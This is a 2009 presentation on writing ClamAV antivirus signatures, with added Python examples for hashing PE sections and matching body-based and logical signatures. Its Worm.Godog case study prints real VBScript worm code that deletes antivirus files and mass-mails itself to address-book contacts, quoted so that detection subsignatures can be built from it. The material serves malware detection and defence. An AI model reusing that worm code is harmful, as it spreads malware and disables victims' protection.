Writing ClamAV Signatures
        Alain Zidouemba
         March 4, 2009
About the presenter

     Alain Zidouemba

      • VRT Research Engineer for over a year

      • Primary responsibilities:
         • Malware research & signature generation – ClamAV
         • Vulnerability research & rule generation – Snort


      • Before Sourcefire: Anti-Malware Research Engineer

Outline

     What is ClamAV
     Where to get ClamAV
     Different ClamAV signature formats:
      •   .hdb
      •   .mdb
      •   .ndb
      •   .ldb
     Whitelisting
     Q&A


ClamAV
What is ClamAV?

     Clam AntiVirus (ClamAV) is an open source
     (GPL) anti-virus toolkit for UNIX, designed
     especially for e-mail scanning on mail gateways.
     It provides a number of utilities, including:
      • A flexible and scalable multi-threaded daemon
        (clamd)
      • A command line scanner (clamscan)
      • An advanced tool for automatic database updates
        (freshclam)
      • sigtool, for inspecting databases and generating
        signatures (more on it later)

Where can I get ClamAV from?

      Latest stable release (as of this talk, March 2009):
      ClamAV 0.94.2
    • http://www.clamav.net/download/sources
      Most popular UNIX operating systems are
      supported:
    • GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X
      An up-to-date list of binary packages is available
      on our website:
    • http://clamav.net/download/packages

Why learn how to write sigs?

     "I thought Sourcefire released signature
     updates several times a day!"

     The official updates are frequent, but a sample that
     only your site has seen is not in them yet; a local
     signature covers the gap until the official one arrives.

ClamAV malware detection

     Goal: recognize and block malware

     Detection is:
      • File-centric
      • Focused on recognizing malicious code in a file

     Not intended to replace desktop AV

     First line of defense (at the gateway, before the
     file reaches a desktop)

ClamAV Virus Database (CVD)

     The ClamAV project distributes two CVD files
      • main.cvd (the large, infrequently rebuilt base)
      • daily.cvd (the frequent incremental updates)
     sigtool (ships with ClamAV) can display
     detailed information on CVD files (build time,
     version, signature count, required functionality
     level and builder) with sigtool --info main.cvd:

Various signature files in the .cvd archive

     A .cvd is a signed, compressed archive of the
     individual database files (hash, PE-section, extended
     and logical signatures, plus the whitelists).
     sigtool --unpack main.cvd extracts them into the
     current directory, which is the easiest way to study
     how the official signatures are written.

Writing signatures for ClamAV
Hash database: *.hdb

       The format for .hdb files is as follows:
     • MD5:Size:MalwareName
       MD5 is the hash of the whole file and Size is its
       length in bytes. Both must match, so a hash signature
       catches exactly one file: any byte changed, added or
       removed defeats it.
       To create a signature for test.exe use the --md5
       option of sigtool, which prints a ready-made line
       (with the file name in the MalwareName field):
     • sigtool --md5 test.exe

Hash database: *.hdb (cont’d)

      That's it! Save the line to a file with the .hdb
      extension and the signature is ready to be used;
      point clamscan at it with the -d (--database)
      option: clamscan -d test.hdb test.exe

     • The name for the detection can be changed: edit the
       third field of the .hdb line (sigtool fills it with
       the file name) and clamscan will report the file
       under the new name.

MD5, PE-section based: *.mdb

      The format for .mdb files is as follows:
       • PESectionSize:MD5:MalwareName
      PESectionSize is the size in bytes of a section's raw
      data and MD5 is the hash of exactly those bytes, so the
      signature matches any PE that carries an identical
      section, whatever the rest of the file looks like.
      The easiest way to generate MD5 based
      section signatures is to extract target PE
      sections into separate files and then run sigtool
      with the option --mdb on each of them:

Case study: Trojan.Bagle-328

      IDA Pro indicates that the sample is “packed”

      Packed with Themida (as per PEiD)

Case study: Trojan.Bagle-328
     (cont'd)

         Themida is used by malware writers...but
         also by legitimate products, so hashing a
         section that belongs to the packer rather than
         to this sample would likely cause a false positive.
         The section to hash must be one that is specific
         to this sample.
         We can use pe-sig, a Ruby script that will
         create sigs for each section of a PE file, and
         pick the right one:

         Finally, the signature is:
     •   237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328

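     The hashes behind the .hdb and .mdb slides above, and the
     Trojan.Bagle-328 section signature, can be reproduced without
     sigtool. The following Python is an added example, not ClamAV
     or VRT code: it re-implements what sigtool --md5 and sigtool
     --mdb compute (the MD5 of the whole file for .hdb, the MD5 of
     each section's raw data for .mdb) on top of a minimal PE
     section-table parser, and builds a small constructed PE32
     image to run against, since these slides ship no sample.
     Every offset read from the header is bounds-checked before
     hashing, so a truncated or malformed file raises instead of
     producing a signature for garbage.

```python
"""Generate ClamAV .hdb and .mdb lines the way sigtool --md5 / --mdb do.
Added example, not ClamAV's code: re-implements the hashing in Python so the
formats can be studied without sigtool; the PE image hashed is constructed."""
import hashlib
import struct


def hdb_line(data: bytes, name: str) -> str:
    """Whole-file hash signature, MD5:Size:MalwareName (what sigtool --md5 prints)."""
    return f"{hashlib.md5(data).hexdigest()}:{len(data)}:{name}"


def pe_sections(pe: bytes) -> list[tuple[str, int, int]]:
    """Return (name, PointerToRawData, SizeOfRawData) for each section of a PE.
    Every offset is bounds-checked first: a truncated or malformed header
    raises ValueError instead of yielding a signature for garbage."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                  # COFF file header
    if coff + 20 > len(pe):
        raise ValueError("truncated COFF header")
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt                         # section table
    if table + 40 * num_sections > len(pe):
        raise ValueError("section table runs past end of file")
    out = []
    for i in range(num_sections):
        ent = table + 40 * i
        name = pe[ent:ent + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_off = struct.unpack_from("<II", pe, ent + 16)
        if raw_off + raw_size > len(pe):
            raise ValueError(f"section {name} extends past end of file")
        out.append((name, raw_off, raw_size))
    return out


def mdb_lines(pe: bytes, name: str) -> list[str]:
    """Section hash signatures, PESectionSize:MD5:MalwareName, one per section
    that has raw data (what sigtool --mdb prints for each extracted section)."""
    lines = []
    for _sec, off, size in pe_sections(pe):
        if size == 0:
            continue                  # nothing on disk to hash (e.g. .bss)
        digest = hashlib.md5(pe[off:off + size]).hexdigest()
        lines.append(f"{size}:{digest}:{name}")
    return lines


def build_test_pe(sections: list[tuple[bytes, bytes]]) -> bytes:
    """Construct a minimal PE32 image with the given (name, data) sections.
    This is a hand-made test file, not real malware."""
    e_lfanew, size_opt = 0x40, 0xE0
    header_len = e_lfanew + 4 + 20 + size_opt + 40 * len(sections)
    data_off = (header_len + 0x1FF) & ~0x1FF              # 512-byte file alignment
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (size_opt - 2)  # PE32 magic, rest zero
    table, body, off = b"", b"", data_off
    for sname, sdata in sections:
        raw = sdata + b"\0" * (-len(sdata) % 0x200)
        table += struct.pack("<8sIIIIIIHHI", sname, len(sdata), off, len(raw), off,
                             0, 0, 0, 0, 0x60000020)
        body += raw
        off += len(raw)
    header = dos + b"PE\0\0" + coff + opt + table
    return header + b"\0" * (data_off - len(header)) + body


if __name__ == "__main__":
    sample = build_test_pe([(b".text", b"\x55\x8b\xec" * 100), (b".data", b"hello")])
    print(hdb_line(sample, "Test.Sample-1"))        # one .hdb line for the whole file
    for line in mdb_lines(sample, "Test.Sample-1"):  # one .mdb line per section
        print(line)
```

     Pick the section to hash deliberately: a section that every
     Themida-protected binary shares (the false-positive risk the
     Trojan.Bagle-328 slide warns about) will fire on legitimate
     software, while a section unique to the family survives
     changes to the rest of the file that would defeat an .hdb
     entry.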
Extended sig. format: *.ndb

      The format for .ndb files is as follows:
       • MalwareName:TargetType:Offset:HexSignature

       • TargetType is one of the following numbers
         specifying the type of the target file:
          0: Any file
          1: Portable Executable
          2: OLE2 component (eg: VBA script)
          3: HTML (normalized)
          4: Mail file
          5: Graphics
          6: ELF
          7: ASCII text file (normalized)
       • Offset is * (anywhere in the file), an absolute
         byte offset, or EP+n / EP-n relative to the
         executable's entry point (Sx+n, SL+n and EOF-n
         address section x, the last section and the end
         of file); see the Trojan.Exchanger case study.
       • HexSignature is the byte sequence written as hex,
         optionally with wildcards: ?? for any single byte,
         {n} for exactly n bytes, {-n} for up to n bytes,
         {n-} for at least n, {n-m} for a range and * for
         any number of bytes.

Case study: Trojan.Exchanger

      Many samples that are very similar yet not
      byte-identical, so hash signatures would need
      one entry per file. A body signature on the code
      they share covers them all.

Case study: Trojan.Exchanger
     (cont’d)

      5.exe:

      Opcode bytes:
       • e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
      Signature:
       • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Case study: Trojan.Exchanger
     (cont’d)

      7.exe:

      Opcode bytes:
       • e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
      Signature:
       • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Case study: Trojan.Exchanger
     (cont’d)

      Signature for 5.exe:
       • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

      Signature for 7.exe:
       • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

      The two strings differ only in the four bytes after
      81c3 (the 32-bit immediate of an add ebx, imm32
      instruction: c4766402 in 5.exe, 83315a00 in 7.exe),
      so the {4} wildcard, which stands for exactly four
      arbitrary bytes, replaces them.
      Signature to detect both 5.exe and 7.exe:
       • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

Case study: Trojan.Exchanger
     (cont’d)

      Moreover, for 5.exe:
       • EP: 0x4094E0
       • Address of the byte string: 0x4095C5

      For 7.exe:
       • EP: 0x406D87
       • Address of the byte string: 0x406E6C

      In both cases the distance between the EP and our
      byte string is the same: 0xE5 = 229 (decimal)

Case study: Trojan.Exchanger
     (cont’d)

      Finally we can rewrite the signature to be:
       • Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

      Anchoring the string to the entry point makes the
      signature more precise (the bytes must occur exactly
      229 bytes after the EP, not just anywhere in the
      file), and it still matches other samples of the
      family:

Logical signatures: *.ldb

       Logical signatures were introduced in ClamAV 0.94
       The format for .ldb files is as follows:
       • SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;Subsig2;...
       TargetDescriptionBlock contains at least Target:N,
       with N one of the .ndb target types. Each subsignature
       is a hex string in the .ndb body syntax (wildcards
       included), and the logical expression combines them
       by index (0 is the first subsignature) with & (and),
       | (or) and parentheses.

Case study: Worm.Godog

         A mass-mailer worm written in VBScript. This part
         of the code tries to disable installed anti-virus
         products by deleting their files:

     Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
     If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro &
            "\Kaspersky Lab\Kaspersky Antivirus Personal Pro"
     legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")
     If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro &
            "\Kaspersky Lab\Kaspersky Antivirus Personal"
     legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")
     if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"
     legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")
     if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"
     legions.DeleteFile (Registro & "\AVPersonal\*.*")
     if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"
     legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")
     legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")
     legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")

Case study: Worm.Godog
     (cont’d)

          After normalization (the text is lower-cased, so
          FileExists and fileexists become the same string)
          we can create 4 subsignatures, one per attempt to
          disable an AV tool. Each is the hex of the fixed
          text, with {-n} allowing up to n arbitrary bytes
          for the variable parts (object names, path
          remainders):

     (0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro (one
         subsignature covers both, since the second path is a prefix of the first):
     66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
         Decoded, the fixed pieces are: fileexists ( ... & "\kaspersky lab\kaspersky antivirus personal
         ... .deletefile ( ... & "\kaspersky lab\kaspersky antivirus personal

     (1) Antiviral Toolkit Pro:
     66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f

     (2) AVPersonal:
     66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c

     (3) Trend PC-cillin 98:
     66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e

Case study: Worm.Godog
     (cont’d)

           The worm also sends itself to the first 8000 contacts
           found in the address book:
     Set Create = CreateObject ("Scripting.FileSystemObject")
     Set mail = Create.CreateTextFile("C:\mail.vbs")
     mail.writeline "On Error Resume Next"
     mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
     mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
     mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
     mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"
     mail.writeline "For A = 1 To Mail.AddressLists.Count"
     mail.writeline "Set B = Mail.AddressLists (A)"
     mail.writeline "Counter = 1"
     mail.writeline "Set C = leg.CreateItem (0)"
     mail.writeline "For D = 1 To B.AddressEntries.Count"
     mail.writeline "E = B.AddressEntries (Counter)"
     mail.writeline "C.Recipients.Add E"
     mail.writeline "Counter = Counter + 1"
     mail.writeline "If Counter > 8000 Then Exit For"
     mail.writeline "Next"
     mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)
     mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
     mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
     mail.writeline "C.DeleteAfterSubmit = True"
     mail.writeline "C.Send"
     mail.writeline "Next"
     mail.Close
     legion.Run ("C:\mail.vbs")

Case study: Worm.Godog
     (cont’d)

           A subsignature to detect this mass-mailing portion
           of the file could be (its fixed pieces decode to
           "for ", " = 1 to ", ".addressentries.count",
           "recipients.add", "if ", " > ", " then exit for",
           ".attachments.add" and ".send"):
     (4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64

           Finally, we can write this highly flexible
           signature, which fires when any one of the four
           AV-disabling routines is present together with
           the mass-mailing routine:
             • Worm.Godog;Target:0;((0|1|2|3)&(4));(0);(1);(2);(3);(4)
           where (0) to (4) stand for the subsignatures above.
           Written out in a .ldb file it is a single line with
           no spaces:
     Worm.Godog;Target:0;((0|1|2|3)&(4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64

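     Both the Trojan.Exchanger and the Worm.Godog case studies
     come down to two mechanisms: turning a hex string with
     wildcards into a byte matcher, and (for .ldb) combining the
     subsignature hits through a logical expression. The following
     Python is an added example, not ClamAV's matcher: it compiles
     the hex syntax used above (??, {n}, {n-m}, {-n}, {n-}, *) to a
     regular expression over bytes, applies an .ndb offset of *, an
     absolute offset or EP+n/EP-n, and evaluates an .ldb expression
     over the subsignature hits. The entry point's file offset is
     passed in as an assumption rather than read from a PE header,
     the TargetType field is not enforced, and both inputs are
     constructed here: the two Trojan.Exchanger byte strings placed
     229 bytes past a pretend entry point, and a short lower-cased
     VBScript excerpt standing in for the normalised Worm.Godog
     file. The expression is evaluated by walking Python's own AST
     and accepting only the node types the syntax needs, so
     database text never reaches eval().

```python
"""Match ClamAV body-based signatures (.ndb / .ldb) in pure Python. Added example,
not the ClamAV engine: compiles the slides' hex syntax (??, {n}, {n-m}, {-n}, {n-}, *)
to a bytes regex, applies the .ndb offset field and evaluates an .ldb expression."""
import ast
import re

_TOKEN = re.compile(r"\{(\d*)(-?)(\d*)\}|\*|\?\?|[0-9a-fA-F]{2}")


def hex_to_regex(sig: str) -> re.Pattern:
    """Translate one hex subsignature into a compiled bytes regex."""
    parts, pos = [], 0
    for m in _TOKEN.finditer(sig):
        if m.start() != pos:
            raise ValueError(f"bad token at offset {pos} in {sig!r}")
        pos, tok = m.end(), m.group(0)
        if tok == "*":
            parts.append(b".*?")                        # any number of bytes
        elif tok == "??":
            parts.append(b".")                          # any single byte
        elif tok.startswith("{"):
            lo, dash, hi = m.groups()
            if not dash:
                parts.append(b".{%d}" % int(lo))        # {n}: exactly n bytes
            else:                                       # {n-m}, {-m}, {n-}
                parts.append(b".{%s,%s}" % (lo.encode() or b"0", hi.encode()))
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    if pos != len(sig):
        raise ValueError(f"unparsed text at offset {pos} in {sig!r}")
    return re.compile(b"".join(parts), re.DOTALL)


def scan_ndb(data: bytes, line: str, ep_offset=None) -> bool:
    """MalwareName:TargetType:Offset:HexSignature. Offset is '*' (anywhere), an
    absolute file offset, or EP+n / EP-n. A scanner takes the entry point's file
    offset from the PE header; here ep_offset is a caller-supplied assumption."""
    _name, _target, offset, hexsig = line.strip().split(":", 3)   # TargetType not enforced
    pat = hex_to_regex(hexsig)
    if offset == "*":
        return pat.search(data) is not None
    if offset.startswith("EP"):
        if ep_offset is None:
            return False
        pos = ep_offset + int(offset[2:])               # int("+229") == 229
    else:
        pos = int(offset)
    return 0 <= pos <= len(data) and pat.match(data, pos) is not None


def eval_expr(expr: str, hits: list[bool]) -> bool:
    """Evaluate the |, & and parenthesis subset of a logical expression by walking
    Python's AST and accepting only int constants (subsig indices), BitOr and BitAnd,
    so nothing else can run. & binds before |; the slide's expression is bracketed."""
    def walk(node: ast.AST) -> bool:
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return hits[node.value]
        if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.BitOr, ast.BitAnd)):
            left, right = walk(node.left), walk(node.right)
            return (left or right) if isinstance(node.op, ast.BitOr) else (left and right)
        raise ValueError(f"unsupported construct in expression {expr!r}")
    return walk(ast.parse(expr, mode="eval"))


def scan_ldb(data: bytes, line: str) -> bool:
    """SignatureName;TargetDescriptionBlock;LogicalExpression;Sub0;Sub1;..."""
    _name, _tdb, expr, *subsigs = line.strip().split(";")
    hits = [hex_to_regex(s).search(data) is not None for s in subsigs]
    return eval_expr(expr, hits)


# Trojan.Exchanger: the slides' EP+229 signature and two constructed buffers
# carrying the 5.exe / 7.exe byte strings 229 bytes past a pretend entry point.
EXCHANGER_SIG = "Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4"
EP_OFFSET = 71                                          # constructed: 71 + 229 == 300
SAMPLE_5 = b"\x90" * 300 + bytes.fromhex("e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4") + b"\x90" * 64
SAMPLE_7 = b"\xcc" * 300 + bytes.fromhex("e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4") + b"\xcc" * 64
# Worm.Godog: the slides' logical signature on one line, plus a constructed
# lower-cased VBScript excerpt standing in for the normalised file.
GODOG_LDB = (
    "Worm.Godog;Target:0;((0|1|2|3)&(4));"
    "66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;"
    "66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;"
    "66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;"
    "66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;"
    "666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64"
)
GODOG_TEXT = b"\n".join([
    b'if fileexists (registro & "\\avpersonal\\avguard.exe") then path = registro & "\\avpersonal"',
    b'legions.deletefile (registro & "\\avpersonal\\*.*")',
    b'mail.writeline "for d = 1 to b.addressentries.count"',
    b'mail.writeline "c.recipients.add e"',
    b'mail.writeline "if counter > 8000 then exit for"',
    b'mail.writeline "c.attachments.add"& chr(32) & chr(34) & "c:\\legion.vbs" & chr(34)',
    b'mail.writeline "c.send"',
])
```

     scan_ndb(SAMPLE_5, EXCHANGER_SIG, EP_OFFSET) and the same call
     with SAMPLE_7 both return True, while the 5.exe-specific
     signature does not match SAMPLE_7 and the EP-anchored signature
     fails as soon as the entry point is off by one byte.
     scan_ldb(GODOG_TEXT, GODOG_LDB) returns True; cut the excerpt
     to the AV-disabling lines alone and it returns False, because
     (4) no longer matches. The {-n} gaps are what make the Godog
     subsignatures tolerant of renamed variables while still tying
     each fixed piece to the next.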
Whitelisting

      To whitelist a specific file create an entry in a
      database file with the extension .fp following
      the MD5 signature format:

       • MD5:FileSize:Comment

      A file whose hash and size match a .fp entry is
      reported clean even if another signature matches it,
      so sigtool --md5 on the known-good file yields the
      entry directly (replace the file name with a comment).

Whitelisting (cont’d)

       To whitelist a specific signature inside
       main.cvd add the following entry into a local
       file local.ign:
     • db_name:line_number:signature_name
       To ignore "myTestSignature" at line 23 in
       test.ndb:
     • test.ndb:23:myTestSignature
       The entry is tied to a line number, so it has to be
       revisited whenever that database file changes.
       daily.ign: the ClamAV team ships a file of the same
       kind inside daily.cvd to switch off signatures in
       main.cvd that turn out to be false positives, without
       waiting for a new main.cvd.

More questions?

      clamav-users@lists.clamav.net - user
      questions
      clamav-devel@lists.clamav.net - technical
      discussions
      Alternatively you can try asking on the
      #clamav IRC channel on irc.freenode.net
      If you have questions or comments on this
      presentation: azidouemba@sourcefire.com



ClamAV/VRT/Sourcefire

      Websites
       • http://www.clamav.net
       • http://www.snort.org
       • http://www.sourcefire.com


      Blogs
       • http://clam-av.blogspot.com
       • http://vrt-sourcefire.blogspot.com

Contribute

      Sample submission
       • http://www.clamav.net/sendvirus/


      Upload statistics:
       • freshclam --submit-stats


      Bug submission
       • http://bugs.clamav.net




Q&A
NOW GO AND WRITE
     SIGNATURES!

     Image source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714
